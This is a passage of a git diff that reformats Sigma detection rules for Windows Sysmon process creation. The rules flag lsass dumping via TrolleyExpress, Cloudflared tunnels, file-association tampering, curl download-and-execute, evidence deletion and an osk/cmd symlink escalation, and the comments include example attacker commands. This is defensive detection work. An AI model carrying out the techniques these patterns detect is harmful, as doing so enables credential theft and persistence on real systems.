memory references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.youtube.com/watch?v=Ie831jF0bb0 @@ -23,20 +22,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter - \TrolleyExpress 7 - \TrolleyExpress 8 - \TrolleyExpress 9 - \TrolleyExpress.exe 7 - \TrolleyExpress.exe 8 - \TrolleyExpress.exe 9 + # Common dumpers - '\TrolleyExpress.exe -ma ' renamed: Image|endswith: \TrolleyExpress.exe filter_renamed: OriginalFileName|contains: CtxInstall filter_empty: - OriginalFileName: null + OriginalFileName: condition: process_creation and (selection or ( renamed and not 1 of filter* )) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml index 2570a42c6..ff7b85d97 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_clip_execution.yml @@ -1,9 +1,7 @@ title: Data Copied To Clipboard Via Clip.EXE id: ddeff553-5233-4ae9-bbab-d64d2bd634be status: test -description: Detects the execution of clip.exe in order to copy data to the clipboard. - Adversaries may collect data stored in the clipboard from users copying information - within or between applications. +description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md @@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \clip.exe - - OriginalFileName: clip.exe + - Image|endswith: \clip.exe + - OriginalFileName: clip.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml index 4b00e56d8..6d92c539d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml @@ -1,10 +1,8 @@ title: Cloudflared Portable Execution id: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd status: experimental -description: 'Detects the execution of the "cloudflared" binary from a non standard - location. - - ' +description: | + Detects the execution of the "cloudflared" binary from a non standard location. references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml index 1e8923fa6..8831b1df5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml @@ -1,20 +1,15 @@ title: Cloudflared Quick Tunnel Execution id: 222129f7-f4dc-4568-b0d2-22440a9639ba related: - - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a - type: similar - - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 - type: similar + - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a + type: similar + - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 + type: similar status: experimental -description: 'Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be - used to tunnel local services such as HTTP, RDP, SSH and SMB. - - The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, - following a call to api[.]trycloudflare[.]com. - +description: | + Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. + The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. - - ' references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared @@ -34,58 +29,61 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cloudflared.exe - - \cloudflared-windows-386.exe - - \cloudflared-windows-amd64.exe - - Hashes|contains: - - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 - - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 - - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 - - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 - - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 - - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 - - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 - - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a - - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 - - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 - - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 - - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac - - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f - - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d - - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 - - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b - - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f - - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 - - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 - - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f - - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 - - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c - - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f - - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 - - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 - - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 - - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c - - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 - - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f - - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad - - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 - - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 - - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 - - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 - - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f - - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 - - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + - Image|endswith: + - \cloudflared.exe + - \cloudflared-windows-386.exe + - \cloudflared-windows-amd64.exe + - Hashes|contains: + - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 + - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 + - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 + - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 + - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 + - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 + - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 + - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a + - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 + - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 + - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 + - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac + - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f + - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d + - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 + - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b + - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f + - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 + - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 + - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f + - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 + - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c + - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f + - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 + - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 + - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 + - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c + - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 + - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f + - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad + - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 + - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 + - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 + - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 + - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f + - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 + - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 + - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + # Note: + # Accounts for the cloudflared binaries being renamed + # `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names selection_param: - - CommandLine|contains|all: - - -url - - tunnel - - CommandLine|contains: - - .exe -url - - .exe --url + - CommandLine|contains|all: + - -url + - tunnel + - CommandLine|contains: + - .exe -url + - .exe --url selection_other: - CommandLine|contains|all: + CommandLine|contains|all: - -url - -no-autoupdate condition: process_creation and ((selection_img and selection_param) or selection_other) diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml index fd7fbd453..0d5c9f250 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml @@ -1,8 +1,7 @@ title: Cloudflared Tunnel Connections Cleanup id: 7050bba1-1aed-454e-8f73-3f46f09ce56a status: experimental -description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" - flag in order to cleanup tunnel connections. +description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. references: - https://github.com/cloudflare/cloudflared - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml index d38e42a6b..df38a288a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml @@ -1,9 +1,7 @@ title: Cloudflared Tunnel Execution id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 status: experimental -description: Detects execution of the "cloudflared" tool to connect back to a tunnel. - This was seen used by threat actors to maintain persistence and remote access - to compromised networks. +description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. references: - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group - https://github.com/cloudflare/cloudflared @@ -25,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml index b54f9214b..a65408f0b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml @@ -1,19 +1,12 @@ title: Change Default File Association Via Assoc id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 related: - - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 - type: similar + - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 + type: similar status: test -description: 'Detects file association changes using the builtin "assoc" command. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects file association changes using the builtin "assoc" command. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md author: Timur Zinniatullin, oscd.community @@ -31,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: assoc + CommandLine|contains: assoc condition: process_creation and (all of selection_*) fields: - Image diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml index 0bd13fd77..12c6d6394 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml @@ -1,20 +1,12 @@ title: Change Default File Association To Executable Via Assoc id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 related: - - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 - type: derived + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + type: derived status: test -description: 'Detects when a program changes the default file association of any extension - to an executable. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects when a program changes the default file association of any extension to an executable. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc author: Nasreddine Bencherchali (Nextron Systems) @@ -32,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'assoc ' - exefile filter: - CommandLine|contains: .exe=exefile + CommandLine|contains: .exe=exefile condition: process_creation and (all of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml index c16912930..114199e85 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml @@ -1,8 +1,7 @@ title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE id: 044ba588-dff4-4918-9808-3f95e8160606 status: experimental -description: Detects usage of the copy builtin cmd command to copy files with the - ".dmp"/".dump" extension from a remote share +description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -15,17 +14,18 @@ logsource: category: process_creation product: windows detection: + # Example: copy \\\\\\process.dmp C:\Users\process.dmp process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - ' \\\\' - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml index 820e0d875..32220433c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml @@ -1,10 +1,9 @@ title: Curl Download And Execute Combination id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288 status: test -description: Adversaries can use curl to download payloads remotely and execute them. - Curl is included by default in Windows 10 build 17063 and later. +description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. references: - - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 + - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link author: Sreeman, Nasreddine Bencherchali (Nextron Systems) date: 2020/01/13 modified: 2023/03/06 @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - 'curl ' - http diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml index 88a4668a4..2661f3542 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml @@ -1,18 +1,11 @@ title: File Deletion Via Del id: 379fa130-190e-4c3f-b7bc-6c8e834485f3 status: test -description: 'Detects execution of the builtin "del"/"erase" commands in order to - delete files. - +description: | + Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -31,21 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_flags: - CommandLine|contains: - - ' /f' - - ' /s' - - ' /q' + CommandLine|contains: + - ' /f' # Force deleting of read-only files. + - ' /s' # Delete specified files from all subdirectories. + - ' /q' # Quiet mode, do not ask if ok to delete on global wildcard condition: process_creation and (all of selection_*) falsepositives: - - False positives levels will differ Depending on the environment. You can use - a combination of ParentImage and other keywords from the CommandLine field - to filter legitimate activity + - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml index 2863eb9c5..bb6cf5192 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml @@ -1,9 +1,7 @@ title: Greedy File Deletion Using Del id: 204b17ae-4007-471b-917b-b917b315c5db status: experimental -description: Detects execution of the "del" builtin command to remove files using - greedy/wildcard expression. This is often used by malware to delete content of - folders that perhaps contains the initial malware infection or to delete evidence. +description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. references: - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -18,18 +16,20 @@ logsource: category: process_creation product: windows detection: + # Example: + # del C:\ProgramData\*.dll & exit process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_extensions: - CommandLine|contains: + CommandLine|contains: - \\\*.au3 - \\\*.dll - \\\*.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml index cb065043a..3358f6799 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml @@ -1,8 +1,7 @@ title: Files And Subdirectories Listing Using Dir id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 status: test -description: Detects usage of the "dir" command that is part of Windows batch/cmd - to collect information about directories +description: Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /s' - ' /b' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml index bc33125ea..9f899df1a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ^^ - ^|^ - ',;,' @@ -36,6 +36,9 @@ detection: - ' s^et ' - ' s^e^t ' - ' se^t ' + # - '%%' + # - '&&' + # - '""' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml index a1b10927a..9b8e30b83 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml @@ -1,9 +1,7 @@ title: Command Line Execution with Suspicious URL and AppData Strings id: 1ac8666b-046f-4201-8aba-1951aaec03a3 status: test -description: Detects a suspicious command line execution that includes an URL and - AppData string in the command line parameters as used by several droppers (js/vbs - > powershell) +description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) references: - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 @@ -26,8 +24,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \cmd.exe - CommandLine|contains|all: - - http + CommandLine|contains|all: + - http # captures both http and https - :// - '%AppData%' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml index 729e3d362..641ab3266 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml @@ -1,10 +1,7 @@ title: Potential Privilege Escalation Using Symlink Between Osk and Cmd id: e9b61244-893f-427c-b287-3e708f321c6b status: test -description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility - on-screen keyboard binary (osk.exe) using "mklink". This technique provides an - elevated command prompt to the user from the login screen without the need to - log in. +description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md - https://ss64.com/nt/mklink.html @@ -24,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - \osk.exe - \cmd.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml index 9122b6f9f..5c73b7923 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml @@ -1,8 +1,7 @@ title: VolumeShadowCopy Symlink Creation Via Mklink id: 40b19fa6-d835-400c-b301-41f3a2baacaf status: stable -description: Shadow Copies storage symbolic link creation using operating systems - utilities +description: Shadow Copies storage symbolic link creation using operating systems utilities references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - HarddiskVolumeShadowCopy condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml 